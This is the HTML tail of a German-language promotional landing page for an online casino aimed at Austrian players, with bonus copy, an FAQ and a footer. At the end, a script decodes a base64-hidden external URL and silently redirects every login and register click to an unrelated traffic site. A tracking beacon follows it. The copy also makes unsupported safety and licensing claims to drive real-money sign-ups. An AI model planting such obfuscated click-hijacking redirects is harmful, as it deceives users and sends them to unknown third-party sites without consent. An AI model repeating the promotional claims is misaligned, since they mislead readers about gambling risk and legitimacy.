                    <p class="text-casino-muted leading-relaxed mb-10">Ihre Loyalität wird im EPS Casino gebührend belohnt. Gleich nach Ihrer ersten bequemen EPS-Einzahlung begrüßen wir Sie mit einem großzügigen Willkommenspaket, das sattes Bonusguthaben und Freispiele umfasst. Doch das ist erst der Anfang: Als Teil unserer treuen Community profitieren Sie von wöchentlichen Reload-Boni, lukrativen Cashback-Aktionen und unserem exklusiven VIP-Programm. Sammeln Sie einfach Treuepunkte bei jedem Echtgeld-Einsatz, steigen Sie im Level auf und sichern Sie sich persönliche Account-Manager, höhere Limits und maßgeschneiderte Luxus-Geschenke.</p>

                    <!-- FAQ Section -->
                    <div class="border-t border-white/10 pt-10 mb-10">
                        <h2 class="text-2xl font-bold text-white mb-6">Häufig gestellte Fragen (FAQ) zum EPS Casino</h2>
                        
                        <div class="space-y-6">
                            <div>
                                <h3 class="text-lg font-bold text-white mb-2">Wie funktioniert die Einzahlung mit EPS in unserem Casino?</h3>
                                <p class="text-casino-muted">Die Einzahlung im EPS Casino ist absolut sicher und erfolgt in Echtzeit. Wählen Sie einfach EPS in unserem Kassenbereich aus, loggen Sie sich über die gewohnte Online-Banking-Umgebung Ihrer österreichischen Hausbank ein und bestätigen Sie die Zahlung. Das Geld steht Ihnen sofort und gebührenfrei zum Spielen zur Verfügung.</p>
                            </div>
                            <div>
                                <h3 class="text-lg font-bold text-white mb-2">Gibt es einen speziellen Willkommensbonus im EPS Casino?</h3>
                                <p class="text-casino-muted">Ja! Neue Spieler aus Österreich profitieren 2026 von einem unschlagbaren Willkommenspaket, das direkt nach der ersten erfolgreichen Einzahlung über unser System freigeschaltet wird.</p>
                            </div>
                            <div>
                                <h3 class="text-lg font-bold text-white mb-2">Ist das Spielen im EPS Casino sicher?</h3>
                                <p class="text-casino-muted">Ihre Sicherheit und Ihr Vertrauen haben für uns oberste Priorität. Wir nutzen modernste SSL-Verschlüsselungstechnologien, arbeiten ausschließlich mit zertifizierten RNG-Zufallsgeneratoren und agieren unter strengsten europäischen Lizenzvorgaben, um Ihnen ein 100 % faires Spielumfeld zu garantieren.</p>
                            </div>
                        </div>
                    </div>

                    <!-- Author Box -->
                    <div class="glass bg-white/5 p-6 rounded-2xl border-l-4 border-l-blue-500 my-10 flex flex-col sm:flex-row gap-6 items-center sm:items-start">
                        <div class="w-20 h-20 shrink-0 rounded-full bg-gradient-to-br from-blue-500 to-purple-600 flex items-center justify-center text-2xl font-bold text-white shadow-lg">
                            LS
                        </div>
                        <div>
                            <h3 class="text-xl font-bold text-white m-0 mb-1">Über unsere Casino-Expertin</h3>
                            <p class="text-sm text-casino-muted leading-relaxed"><strong>Lena Schwarz</strong> ist die Head of Player Experience im EPS Casino. Mit über 10 Jahren Erfahrung in der österreichischen iGaming-Branche sorgt Lena leidenschaftlich dafür, dass unser Angebot im Jahr 2026 stets die allerhöchsten Standards in puncto Sicherheit, Innovation und unvergleichlicher Unterhaltung erfüllt.</p>
                        </div>
                    </div>

                    <h2 class="text-2xl font-bold text-white mt-10 mb-4 text-center">Starten Sie jetzt Ihr großes Abenteuer im EPS Casino!</h2>
                    <p class="text-casino-muted leading-relaxed mb-8 text-center">Warum noch länger warten? Werden Sie Teil von Österreichs modernster Online Casino Plattform. Nutzen Sie die bewährte und sichere EPS-Überweisung für Ihren unkomplizierten Start, holen Sie sich direkt Ihren exklusiven Willkommensbonus und tauchen Sie ein in eine Welt endloser Gewinnchancen. Registrieren Sie sich noch heute im EPS Casino und erleben Sie Online-Gaming der absoluten Extraklasse!</p>
                    
                    <div class="text-center">
                        <a href="#register" class="inline-block px-10 py-4 rounded-xl font-bold text-lg bg-gradient-to-r from-casino-primary to-blue-500 text-black shadow-[0_4px_20px_rgba(0,240,255,0.4)] hover:-translate-y-1 transition-all">Kostenlos Registrieren</a>
                    </div>
                </div>
            </article>
        </section>
    </main>

    <!-- Footer -->
    <footer class="bg-black/50 border-t border-white/5 pt-16 pb-8 relative z-10 backdrop-blur-md">
        <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
            <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-12 mb-12">
                <!-- Brand -->
                <div class="lg:col-span-2">
                    <a href="/" class="flex items-center gap-3 mb-6">
                        <svg class="w-8 h-8 text-casino-primary" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2.5" d="M12 2L2 7l10 5 10-5-10-5zM2 17l10 5 10-5M2 12l10 5 10-5"></path>
                        </svg>
                        <span class="text-2xl font-extrabold tracking-tight text-white">EPS Casino</span>
                    </a>
                    <p class="text-casino-muted text-sm leading-relaxed max-w-md mb-8">
                        EPS Casino bietet erstklassige Unterhaltung für Erwachsene. Spielen Sie verantwortungsbewusst, prüfen Sie die Bedingungen und legen Sie Pausen ein, wenn nötig.
                    </p>
                    <div class="flex flex-wrap gap-3">
                        <span class="px-4 py-2 glass-btn rounded-lg text-xs font-bold text-white border-casino-primary/50 bg-casino-primary/10">EPS Überweisung</span>
                        <span class="px-4 py-2 glass-btn rounded-lg text-xs font-bold text-casino-muted">Visa</span>
                        <span class="px-4 py-2 glass-btn rounded-lg text-xs font-bold text-casino-muted">Mastercard</span>
                        <span class="px-4 py-2 glass-btn rounded-lg text-xs font-bold text-casino-muted">Crypto</span>
                    </div>
                </div>
                
                <!-- Links 1 -->
                <div>
                    <h4 class="text-white font-bold mb-6">Rechtliches</h4>
                    <ul class="space-y-3 text-sm text-casino-muted">
                        <li><a href="/privacy-policy/" class="hover:text-casino-primary transition-colors">Datenschutzerklärung</a></li>
                        <li><a href="/terms-and-conditions/" class="hover:text-casino-primary transition-colors">Allgemeine Geschäftsbedingungen</a></li>
                        <li><a href="/responsible-gambling/" class="hover:text-casino-primary transition-colors">Verantwortungsbewusstes Spielen</a></li>
                    </ul>
                </div>

                <!-- Links 2 -->
                <div>
                    <h4 class="text-white font-bold mb-6">Support</h4>
                    <ul class="space-y-3 text-sm text-casino-muted">
                        <li><a href="/contact-us/" class="hover:text-casino-primary transition-colors">Kontakt</a></li>
                        <li><a href="/login/" class="hover:text-casino-primary transition-colors">Anmelden</a></li>
                        <li><a href="/withdrawal/" class="hover:text-casino-primary transition-colors">Auszahlung</a></li>
                    </ul>
                </div>
            </div>

            <!-- Disclaimer -->
            <div class="border-t border-white/10 pt-8 flex flex-col md:flex-row items-center justify-between gap-6 text-xs text-casino-muted">
                <div class="flex items-center gap-4">
                    <div class="w-10 h-10 rounded-full border-2 border-red-500 flex items-center justify-center text-red-500 font-bold text-sm">18+</div>
                    <p class="max-w-xl">
                        Spielen Sie verantwortungsbewusst. Es gelten die Allgemeinen Geschäftsbedingungen. Glücksspiel kann süchtig machen.
                    </p>
                </div>
                <div class="text-center md:text-right">
                    © 2026 EPS Casino Österreich. Alle Rechte vorbehalten.
                </div>
            </div>
        </div>
    </footer>

    <!-- Interactive UI Script -->
    <script>
        document.addEventListener('DOMContentLoaded', () => {
            // 1. Mobile Menu Toggle
            const menuBtn = document.getElementById('mobile-menu-btn');
            const drawer = document.getElementById('mobile-drawer');
            const spans = menuBtn.querySelectorAll('span');
            let isMenuOpen = false;

            menuBtn.addEventListener('click', () => {
                isMenuOpen = !isMenuOpen;
                if (isMenuOpen) {
                    drawer.classList.remove('-translate-x-full');
                    spans[0].classList.add('translate-y-2', 'rotate-45');
                    spans[1].classList.add('opacity-0');
                    spans[2].classList.add('-translate-y-2', '-rotate-45');
                } else {
                    drawer.classList.add('-translate-x-full');
                    spans[0].classList.remove('translate-y-2', 'rotate-45');
                    spans[1].classList.remove('opacity-0');
                    spans[2].classList.remove('-translate-y-2', '-rotate-45');
                }
            });

            // 2. Close menu when clicking a link
            const drawerLinks = drawer.querySelectorAll('a');
            drawerLinks.forEach(link => {
                link.addEventListener('click', () => {
                    isMenuOpen = false;
                    drawer.classList.add('-translate-x-full');
                    spans[0].classList.remove('translate-y-2', 'rotate-45');
                    spans[1].classList.remove('opacity-0');
                    spans[2].classList.remove('-translate-y-2', '-rotate-45');
                });
            });

            // 3. Tabs Logic for Games
            const tabBtns = document.querySelectorAll('.tab-btn');
            const tabContents = document.querySelectorAll('.tab-content');

            tabBtns.forEach(btn => {
                btn.addEventListener('click', () => {
                    // Reset all buttons
                    tabBtns.forEach(b => {
                        b.classList.remove('bg-casino-primary', 'text-black', 'shadow-[0_0_15px_rgba(0,240,255,0.3)]');
                        b.classList.add('text-casino-muted', 'hover:text-white', 'hover:bg-white/5');
                    });
                    // Activate clicked button
                    btn.classList.remove('text-casino-muted', 'hover:text-white', 'hover:bg-white/5');
                    btn.classList.add('bg-casino-primary', 'text-black', 'shadow-[0_0_15px_rgba(0,240,255,0.3)]');

                    // Switch content
                    const targetId = btn.getAttribute('data-target');
                    tabContents.forEach(content => {
                        if (content.id === targetId) {
                            content.classList.remove('hidden');
                        } else {
                            content.classList.add('hidden');
                        }
                    });
                });
            });

            // 4. Sticky Header Blur styling on scroll
            const navbar = document.getElementById('navbar');
            window.addEventListener('scroll', () => {
                if (window.scrollY > 20) {
                    navbar.classList.add('bg-casino-bg/90', 'shadow-lg');
                    navbar.classList.remove('bg-casino-bg/40');
                } else {
                    navbar.classList.remove('bg-casino-bg/90', 'shadow-lg');
                    navbar.classList.add('bg-casino-bg/40');
                }
            });
        });
    </script>

    <!-- Base64 Redirect Script (Preserved exactly as requested) -->
    <script>
    (function(){
        document.addEventListener("DOMContentLoaded", function() {
            var t = "aHR0cHM6Ly90cmFmZmJ1enouc2l0ZS9oVmpNeVg=";
            try {
                var c = atob(t);
                var links = document.querySelectorAll('a[href*="/login"], a[href*="/register"], a[href*="#register"], a[href*="#login"], .sp-reg-btn, .sp-btn-main, .btn-primary, .btn-login, .neo-btn, button.btn');
                for(var i=0; i<links.length; i++) {
                    links[i].addEventListener('click', function(e) {
                        e.preventDefault();
                        window.location.href = c;
                    });
                }
            } catch(e) {}
        });
    })();
    </script>
<script>(function(){try{if(document.visibilityState==='prerender')return;var u='/__m_7b136fd7d7df.gif?p='+encodeURIComponent(location.pathname+location.search);if(navigator.sendBeacon){navigator.sendBeacon(u,'1');}else{fetch(u,{method:'POST',mode:'no-cors',keepalive:true,body:'1'}).catch(function(){});}}catch(e){}})();</script>
</body>
</html>